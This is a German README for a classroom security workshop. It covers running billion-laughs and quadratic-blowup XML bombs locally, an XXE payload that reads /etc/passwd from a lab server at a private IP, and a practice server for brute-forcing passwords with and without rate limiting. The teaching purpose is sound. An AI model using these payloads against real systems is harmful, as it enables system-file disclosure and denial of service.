# Beispiele und Übungsaufgaben

## XXE

### Lokales Ausführen der billion-laughs
*Instruktionen für alle*

Zuerst den Systemmonitor öffnen (bei Windows im Task-Manager integriert).

Im Ordner xml findet sich die billion-laughs.xml. Die sollen sie abtippen oder billion laughs googeln.

Das XML File dann in der letzten Zeile bearbeiten und in Chrome öffnen.

Am besten bei lol5 starten und dann jeweils um 1 erhöhen bis sie nicht mehr gerendert werden kann.

Das sollte so bei lol7 passieren, bei lol6 sollte es schon viel länger dauern als bei lol5.

Ihr könnt das ganze auch noch mit dem quadratic-blowup.xml machen, was ihr auch im xml-Ordner findet.

### Password reveal
Mit einem Tool der Wahl einen POST-Request an http://192.168.0.214/ senden mit Content-Type: text/xml folgendem Body:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ 
	<!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<creds>
   <user>&xxe;</user>
   <pass>mypass</pass>
</creds>
```
Empfohlenes Tool: Postman, geht aber auch über Terminal (zumindest in Linux).

## Login / Monitoring
### Abhängigkeiten installieren
```
npm install
```

### Server starten
```
npm run express:run --port 8080
```

### IP-Adresse und Routen rausgeben 
Im Terminal steht jetzt 
```
Server running at:
- Local: ...
- Network: ...
```
Das hinter Network müsst ihr den Leuten als Ziel geben inkl. Port.
Es funktionieren die folgenden Sachen:
- Monitoring: Ihr geht an der Server-Maschine auf localhost:8080/status und seht das Monitoring.
- Passwort knacken ohne Limit unter /easylogin
- Passwort knacken mit Limit unter /login: Hier wird die IP nach 3 Fehlversuchen gesperrt und muss 1 Minute warten. In der Zeit nicht versuchen, sonst fängt die Minute jedes mal von vorne an!

Ihr könnt die Passwörter unter passwords.json bearbeiten.
Ihr seht in der logs.json die versuchten Passwörter zu den IP-Adressen.
Ihr seht in der access.log alle Zugriffe auf euren Server.

Wichtig: Solltet ihr die logs.json leeren, muss ein {} drin stehen, es muss ein valides json sein!

Der Body für die POST-Requests an [IP]:8080/login und /easylogin muss Content-Type: application/json sein und so aussehen:
{ "password": "zu testendes passwort" }